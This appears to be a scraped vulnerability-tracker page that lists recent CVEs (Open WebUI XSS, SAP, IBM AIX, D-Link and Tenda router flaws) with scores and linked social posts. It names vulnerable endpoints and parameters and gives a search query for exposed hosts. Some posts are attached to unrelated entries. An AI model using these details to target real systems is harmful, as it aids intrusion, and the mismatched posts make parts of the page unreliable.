Overview
Description
This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.
Statistics
- 1 Post
Last activity: 7 hours ago
Bluesky
π¨ Critical patch for #OracleLinux 8: CVE-2025-21140 affects Keylime, a core attestation tool. Remote attackers can cause a DoS, blinding your security monitoring. Read more: π tinyurl.com/565p3yws #Security
Overview
- open-webui
- open-webui
08 Nov 2025
Published
10 Nov 2025
Updated
CVSS v3.1
HIGH (8.7)
EPSS
0.02%
KEV
Description
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35.
Statistics
- 1 Post
Last activity: 6 hours ago
Fediverse
π¨CVE-2025-64495: Open WebUI vulnerable to Stored DOM XSS via prompts when 'Insert Prompt as Rich Text' is enabled resulting in ATO/RCE
CVSS: 8.7
PoC & Advisory: https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch
FOFA Query: app="Open-WebUI"
FOFA Results: 151,305
Overview
- SAP_SE
- SAP Solution Manager
11 Nov 2025
Published
12 Nov 2025
Updated
CVSS v3.1
CRITICAL (9.9)
EPSS
0.05%
KEV
Description
Due to missing input sanitation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could provide the attacker with full control of the system hence leading to high impact on confidentiality, integrity and availability of the system.
Statistics
- 1 Post
Last activity: 16 hours ago
Fediverse
"Due to missing input sanitation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could provide the attacker with full control of the system hence leading to high impact on confidentiality, integrity and availability of the system."
Base Score: 9.9 CRITICAL
Overview
Description
IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 NIM server (formerly known as NIM master) service (nimesis) could allow a remote attacker to execute arbitrary commands due to improper process controls. Β This addresses additional attack vectors for a vulnerability that was previously addressed in CVE-2024-56346.
Statistics
- 1 Post
Last activity: 6 hours ago
Bluesky
Critical IBM AIX RCE (CVE-2025-36250, CVSS 10.0) Flaw Exposes NIM Private Keys and Risks Directory Traversal
Overview
- Intel(R) Server Board S2600ST Family BIOS and Firmware Update software
13 Nov 2024
Published
14 Nov 2024
Updated
CVSS v4.0
MEDIUM (5.4)
EPSS
0.02%
KEV
Description
Uncontrolled search path for the Intel(R) Server Board S2600ST Family BIOS and Firmware Update software all versions may allow an authenticated user to potentially enable escalation of privilege via local access.
Statistics
- 1 Post
Last activity: 14 hours ago
Bluesky
Just published a technical analysis of CVE-2024-34167, a high-severity NULL pointer dereference in libxml2 affecting #openSUSE Leap. Read more: π tinyurl.com/bdf92mu7 #Securitty
Overview
- Chunghwa Telecom
- TenderDocTransfer
17 Nov 2025
Published
17 Nov 2025
Updated
CVSS v4.0
HIGH (7.0)
EPSS
0.20%
KEV
Description
TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system.
Statistics
- 1 Post
Last activity: 19 hours ago
Fediverse
π₯ CVE-2025-13282 (HIGH): Chunghwa Telecom TenderDocTransfer allows unauth'd file deletion via CSRF & path traversal flaws. Block app/API ports, educate users, and back up data! No patch yet. Details: https://radar.offseq.com/threat/cve-2025-13282-cwe-352-cross-site-request-forgery--6b3e8d3f #OffSeq #CSRF #infosec #vuln
Overview
- D-Link
- DIR-816L
14 Nov 2025
Published
17 Nov 2025
Updated
CVSS v4.0
CRITICAL (9.3)
EPSS
0.17%
KEV
Description
A vulnerability was detected in D-Link DIR-816L 2_06_b09_beta. Affected by this vulnerability is the function authenticationcgi_main of the file /authentication.cgi. Performing manipulation of the argument Password results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.
Statistics
- 1 Post
- 8 Interactions
Last activity: 9 hours ago
Fediverse
Overview
Description
A security vulnerability has been detected in Tenda CH22 1.0.0.1. This impacts the function fromPptpUserSetting of the file /goform/PPTPUserSetting. The manipulation of the argument delno leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.
Statistics
- 1 Post
- 8 Interactions
Last activity: 9 hours ago
Fediverse
Overview
- D-Link
- DWR-M920
17 Nov 2025
Published
17 Nov 2025
Updated
CVSS v4.0
HIGH (8.7)
EPSS
Pending
KEV
Description
A weakness has been identified in D-Link DWR-M920, DWR-M921, DWR-M960, DIR-822K and DIR-825M 1.01.07. This issue affects some unknown processing of the file /boafrm/formTracerouteDiagnosticRun. Executing manipulation of the argument host can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be exploited.
Statistics
- 1 Post
- 2 Interactions
Last activity: 1 hour ago
Fediverse
Overview
- D-Link
- DWR-M920
17 Nov 2025
Published
17 Nov 2025
Updated
CVSS v4.0
MEDIUM (5.3)
EPSS
Pending
KEV
Description
A security vulnerability has been detected in D-Link DWR-M920, DWR-M921, DIR-822K and DIR-825M 1.1.5. Impacted is the function system of the file /boafrm/formDebugDiagnosticRun. The manipulation of the argument host leads to command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.
Statistics
- 1 Post
- 2 Interactions
Last activity: 1 hour ago